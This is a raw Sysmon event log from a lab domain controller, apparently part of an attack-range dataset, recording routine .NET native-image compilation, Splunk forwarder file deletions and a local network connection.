21:06:27.781{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f60-0\System.Web.ApplicationServices.dll2021-06-23 21:06:27.781 10341000x800000000000000022025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.703{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.703{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.644{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.624{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.624{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:27.562{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ba0-0\System.Web.Abstractions.dll2021-06-23 21:06:27.562 10341000x800000000000000022018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.515{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.515{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.281{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.281{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.221{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7806767FA8E034422970EA6C94FF11C9,SHA256=9C29E8082C59CD5D652BD9A7D3BFD545A2B2DB54750086FFEFB0FB5418543AEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.546{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69EE1917052CC418564DCFBB3D4A4A01,SHA256=A97875EFC810A952A16D114DF4F4305FA5CCADAC52F6A8769BAC9BBDB16C6A87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.546{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AC984FA5394644755F6BFD94719A55F,SHA256=DC8C9E81F5927EC61B2CDA5143D2CE5536F9EAA0D4F8723668B69E7C895B57BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.245{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61451-false10.0.1.12-8000- 23542300x800000000000000022033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.265{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAB1F5AF1C710AD40CA216517A9B9328,SHA256=89B93446B46DA4485720DB8499F4AD52CD71D5014CB68E20140C4794EBBE28D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.921{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.827{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.827{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:29.687{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\410-0\System.Web.DataVisualization.dll2021-06-23 21:06:29.687 23542300x800000000000000022037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.281{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8FA55F40A1067BE0B6D759477919EBC,SHA256=F562505E5AFB8800C7496813FAA284A2B9D386F7F31F85FCF2E16E445FE8745B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.838{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69EE1917052CC418564DCFBB3D4A4A01,SHA256=A97875EFC810A952A16D114DF4F4305FA5CCADAC52F6A8769BAC9BBDB16C6A87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.557{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.510{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 